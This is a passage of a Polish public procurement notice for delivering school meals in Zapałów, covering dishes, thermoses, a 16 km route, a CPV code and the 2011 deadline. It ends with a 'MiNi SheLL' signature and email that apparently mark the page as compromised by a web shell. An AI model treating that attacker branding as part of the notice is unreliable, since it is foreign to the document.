Zamawiający zabezpiecza naczynia  ceramiczne  dla potrzeb wydawania   posiłków  
wyłącznie  w stołówce gimnazjum w Zapałowie, natomiast w zakresie obiadów dowożonych do szkoły podstawowych, Wykonawca zobowiązany jest do 
zabezpieczenia termosów  oraz jednorazowych  naczyń i sztućców do wydawania 
posiłków oraz  środek transportu.
5.8. Długość tras dowozu posiłków wynosi:
1.	Zapałów  -  Szkoła Podstawowa w Ryszkowej Woli  - 16 km..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com